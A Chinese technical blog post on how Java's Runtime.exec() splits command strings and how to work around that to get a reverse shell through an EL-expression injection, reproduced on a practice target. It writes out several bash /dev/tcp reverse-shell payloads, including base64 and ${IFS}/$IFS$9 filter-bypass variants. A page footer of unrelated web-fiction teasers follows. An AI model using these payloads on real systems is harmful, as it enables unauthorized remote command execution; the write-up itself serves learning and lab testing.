Java Runtime.exe() 执行命令与反弹shell(下)

续上篇

上篇详细内容请见

0x04 Runtime.exec() 理解

通过查阅资料和自己实践发现,exec方法总共六个重载方法

public Process exec(String command) throws IOException {
        return exec(command, null, null);
}

public Process exec(String command, String[] envp) throws IOException {
        return exec(command, envp, null);
}

public Process exec(String command, String[] envp, File dir)
        throws IOException {
        if (command.length() == 0)
            throw new IllegalArgumentException("Empty command");

        StringTokenizer st = new StringTokenizer(command);
        String[] cmdarray = new String[st.countTokens()];
        for (int i = 0; st.hasMoreTokens(); i++)
            cmdarray[i] = st.nextToken();
        return exec(cmdarray, envp, dir);
}

public Process exec(String cmdarray[]) throws IOException {
        return exec(cmdarray, null, null);
}

public Process exec(String[] cmdarray, String[] envp) throws IOException {
        return exec(cmdarray, envp, null);
}

public Process exec(String[] cmdarray, String[] envp, File dir)
        throws IOException {
        return new ProcessBuilder(cmdarray)
            .environment(envp)
            .directory(dir)
            .start();
}

但不管哪个方法,最后都是调用执行 exec(String[] cmdarray, String[] envp, File dir)

首先来看我调用的 exec(String command) ,它经过 exec(String command, String[] envp, File dir) 函数里 StringTokenizer 通过分割符进行分割。java 默认的分隔符是空格("")、制表符(\t)、换行符(\n)、回车符(\r)。最后存入字符串数组,再传入执行函数。

而它的底层也是调用的 ProcessBuilder 创建进程,而 array[0] 其实就是进程位置

image

在经过查阅资料,我发现直接传入字符串之所以不能 执行命令,主要有这几个原因。:

1、重定向和管道符的使用方式在正在启动的进程的中没有意义。这是什么意思呢?例如,ls > dir_listing 在shell中执行为将当前目录的列表输出到命名为 dir_listing 。但是在 exec() 函数的中,该命令为解释为获取 >dir_listing 目录的列表。

image

换句话来讲,就是重定向和管道符,需要在我们诸如 bash 的环境下才有意义。所以我们需要将 /bin/bash 赋予给 array[0] 来调用 bash 进程。

image

2、参数无法界定范围。当在你直接传入 exec("bash -c 'bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1'") 整个字符串后。会经过 StringTokenizer 进行分割,会变成

"bash" "-c" "'bash" "-i" ">&" "/dev/tcp/xx.xx.xx.xx/6543" "0>&1"

这会导致参数无法界定。比如我们此处解析的参数就是 -c 'bash

也就是说我们这里的参数 -c 的值,需要不让他做分割。

0x05 执行方法

1、传入数组执行

回过头来看我们 exec() 的重载方法,发现如果是传入数组的话 exec(cmdarray[]) ,它并不会进行分割的,所以反弹shell是可以采用的

exec(new String[]{"bash","-c","bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1")

但是我在执行这句命令的时候,由于我复现的漏洞是根据一个EL表达式来执行的。我键入 {} 以后便不会执行命令,原因我猜测是因为以 } 结尾后,导致语句出错,便不执行。

image

而网上的另一种写法,我反正本地是一红到底

exec(["/bin/bash","-c","bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1"] as String[])
image

也就是我们这里暂时是没法传入数组的,需要只传入一个cmd参数 Runtime.getRuntime().exec(String cmd)

2、传入字符串执行

在上文探讨到,为了让他能正常执行,需要正确的界定 -c 参数,也就是说需要让我们最后需要执行的命令不进行分割。

base64

bash 是支持 base64 编码解码的,所以可以采用,来进行反弹。但是这里同上,存在 {},所以弃用这个方法

exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
IFS
IFS The Internal Field Separator that is used for word splitting after expansion and to split lines into words with the read builtin command. The default value is ''.

bashIFS 是内部域分隔符,其默认值为空白(包括:空格,tab, 和换行)

尝试构造payload:

bash${IFS}-i${IFS}>&${IFS}/dev/tcp/ip/port${IFS}0>&1

但是这样会报不明确的重定向的错误,然后我尝试将所有重定向前后的 ${IFS} 去掉,利用 0>&1 等价于 0<&1 再来构造,就能成功反弹shell了

bash${IFS}-i>&/dev/tcp/ip/port<&1
image

这里的{}使用来做截断使用的,例如 cat$IFSt.txt$IFSt 被当作了变量名。

而再在 $IFS 后面加 $ 也可以起到截断的作用,一般用 $9 ,因为 $9 是当前系统shell进程的第九个参数的持有者,这里始终为空字符串。

image

我们这里 ${IFS}$IFS$9 都是相同的作用,所以直接替换就行了。

bash$IFS$9-i>&/dev/tcp/ip/port<&1

这里便成功执行出来了。

image
@
*

$@ 代表传入参数的列表$* 以字符串方式显示所有传入的参数

例如

/bin/bash -c '$@|bash' 'xxx' 'echo' 'ls'

$@|bash 就相当于获取到的参数作为bash的输入

而这里的由于 $* $@ 只会从脚本里读取参数,所以这里把 xxx 解释为脚本名

也就是说,这里的

'$@|bash' 'xxx' 'echo' 'ls' 
执行的是:
echo 'ls'|bash
image

所以我们便能通过这个来构造我们的反弹shell了(这里的靶机是 vulfocus的试用地址
,各位不用担心漏IP了)

image

总结

总的来说,根据查阅资料和自己实践,收获了很多知识。

特别感谢 spoockK0rz3n 两位大佬的文章,看了大佬的分析后才学到了这么多东西,少走很多弯路。


完结散花~


参考文献

Bash Hackers Wiki

Bash Reference Manual

Linux反弹shell(一)文件描述符与重定向

Linux 反弹shell(二)反弹shell的本质

使用Java反弹shell

绕过exec获取反弹shell

java命令执行payloads

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 155,457评论 4 357
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 65,943评论 1 285
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 105,327评论 0 236
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,307评论 0 201
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 51,630评论 3 283
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,114评论 1 202
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,514评论 2 305
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,227评论 0 193
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,859评论 1 234
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,186评论 2 238
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,741评论 1 255
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,087评论 2 248
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,614评论 3 228
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,926评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,630评论 0 190
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,117评论 2 261
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,076评论 2 257